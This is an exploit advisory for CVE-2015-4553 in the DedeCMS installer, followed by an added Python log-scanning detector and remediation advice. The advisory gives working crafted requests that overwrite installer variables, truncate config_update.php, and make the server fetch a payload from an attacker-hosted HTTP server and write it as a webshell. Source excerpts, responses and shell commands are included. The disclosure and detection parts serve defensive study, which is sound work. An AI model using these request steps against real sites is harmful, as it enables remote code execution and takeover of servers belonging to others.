==========================
# Exploit Title: Dedecms variable coverage leads to getshell
# Date: 26-06-2015
# Vendor Homepage: http://www.dedecms.com/
# Version: dedecms 5.7-sp1 and all older versions
# CVE : CVE-2015-4553
===========================

[CVE-2015-4553] Dedecms variable coverage leads to getshell

#############################################################################
#
# DBAPPSECURITY LIMITED  http://www.dbappsecurity.com.cn/
#
#############################################################################
#
# CVE ID:  CVE-2015-4553
# Subject: Dedecms variable coverage leads to getshell
# Author:  zise
# Date:    06.17.2015
#############################################################################

Introduction:
========

dedecms is a widely deployed open-source CMS.

Affected versions: the newest dedecms 5.7-sp1 and all older versions.
Impact: remote getshell.

Details:
=======

After a default installation of dedecms, the installation directory still contains
/install/index.php or /install/index.php.bak:

    /install/index.php      // exploit runs under IIS and Apache
    /install/index.php.bak  // exploit runs under Apache

Code analysis

    /install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb

#############################################################################

    17 $install_demo_name = 'dedev57demo.txt';
    18 $insLockfile = dirname(__FILE__).'/install_lock.txt';

Here $install_demo_name and $insLockfile are defined.
// echo $install_demo_name;  prints dedev57demo.txt

    29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
    30 {
    31     foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
    32 }

// echo $install_demo_name;  prints aaaa

$install_demo_name has been overwritten by variable coverage: the loop on lines 29-32
registers every GET, POST and cookie parameter as a local variable, so the values
assigned to $install_demo_name and $insLockfile on lines 17 and 18 are replaced by
whatever the client sends.

#############################################################################
GETSHELL Step 1: clear the contents of config_update.php
#############################################################################

config_update.php:

    13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
    14 $linkHost = 'http://flink.dedecms.com/server_url.php';

To obtain the webshell we need to control $updateHost, so variable coverage is first
used to clear config_update.php:

    http://192.168.204.135/install/index.php.bak
    ?step=11
    &insLockfile=a
    &s_lang=a
    &install_demo_name=../data/admin/config_update.php

index.php.bak:

    373 else if($step==11)
    374 {
    375     require_once('../data/admin/config_update.php');
    376     $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
    377
    378     $sql_content = file_get_contents($rmurl);
    379     $fp = fopen($install_demo_name,'w');
    380     if(fwrite($fp,$sql_content))
    381         echo ' <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
    382     else
    383         echo ' <font color="red">[×]</font> 远程获取失败';
    384     unset($sql_content);
    385     fclose($fp);
    386     exit();
    387 }

###
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 06:55:23 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: User-Agent
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<font color="red">[×]</font> 远程获取失败
###

### After execution the file is 0 bytes:

    2015/06/17 14:55        0 config_update.php
    1 file, 0 bytes

#############################################################################
GETSHELL Step 2: serve the payload from a local HTTP server
#############################################################################

    zise:tmp zise$ ifconfig en0
    en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 119.253.3.18 netmask 0xffffff00 broadcast
    zise:tmp zise$ mkdir "dedecms"
    zise:tmp zise$ cd dedecms/
    zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
    zise:dedecms zise$ cd ../
    zise:tmp zise$ python -m SimpleHTTPServer
    Serving HTTP on 0.0.0.0 port 8000 ...
    192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -

####
    http://192.168.204.135/install/index.php.bak
    ?step=11
    &insLockfile=a
    &s_lang=a
    &install_demo_name=hello.php
    &updateHost=http://119.253.3.18:8000/
####

HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<font color="green">[√]</font> 存在(您可以选择安装进行体验)

index.php.bak, same block as above; with config_update.php emptied, $updateHost now
comes from the request, so file_get_contents() fetches the attacker-hosted file and
fwrite() stores it under the client-chosen name:

    378     $sql_content = file_get_contents($rmurl);
    379     $fp = fopen($install_demo_name,'w');
    380     if(fwrite($fp,$sql_content)) // fwrite writes the webshell

Attack complete. The webshell is at http://192.168.204.135/install/hello.php

> zise ^_^
> Security researcher

This vulnerability is also described at http://seclists.org/fulldisclosure/2015/Jun/47
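The two request patterns above (truncating config_update.php, then writing a client-named file via a client-chosen updateHost) leave a distinctive trace in the web server access log. The following is an added detection example, not part of the original advisory, written in Python over constructed Apache-style log lines; the client addresses 203.0.113.10 and 198.51.100.7 are sample values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Locals that /install/index.php(.bak) assigns before its request-to-variable
# loop, and which that loop therefore lets any GET/POST/cookie parameter overwrite.
OVERWRITABLE = {"install_demo_name", "insLockfile", "updateHost", "s_lang"}
TARGET_RE = re.compile(r"/install/index\.php(\.bak)?$")
# Apache common/combined log prefix: ip ident user [time] "method target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def analyse(line):
    """Return a finding dict for a request that abuses the installer, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not TARGET_RE.search(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    hit = sorted(set(params) & OVERWRITABLE)
    if not hit:
        return None  # plain installer visit, nothing overwritten
    reasons = ["request overwrites installer locals: " + ", ".join(hit)]
    name = params.get("install_demo_name", [""])[0]
    if ".." in name or "/" in name:
        reasons.append("install_demo_name carries a path (arbitrary file truncation/write)")
    if name.lower().endswith(".php"):
        reasons.append("install_demo_name ends in .php (server-side code written to webroot)")
    if "updateHost" in params:
        reasons.append("updateHost redirects the demo-data fetch to a client-chosen host")
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path, "reasons": reasons}

def scan(lines):
    return [f for f in map(analyse, lines) if f]

# Constructed sample log: one normal hit, one benign installer visit, then the two
# steps of the advisory (truncate config_update.php, then write hello.php).
SAMPLE_LOG = [
    '203.0.113.10 - - [17/Jun/2015:14:50:01 +0800] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.10 - - [17/Jun/2015:14:51:07 +0800] "GET /install/index.php HTTP/1.1" 200 2048',
    '203.0.113.10 - - [17/Jun/2015:14:55:23 +0800] "GET /install/index.php.bak?step=11&insLockfile=a'
    '&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.1" 200 55',
    '203.0.113.10 - - [17/Jun/2015:15:11:18 +0800] "GET /install/index.php.bak?step=11&insLockfile=a'
    '&s_lang=a&install_demo_name=hello.php&updateHost=http://198.51.100.7:8000/ HTTP/1.1" 200 81',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], "; ".join(f["reasons"]))
```

Any hit on the installer with these parameters after installation is complete is worth treating as an incident; the remediation the vendor's own installer expects is removing the /install directory (including index.php.bak) once setup is done.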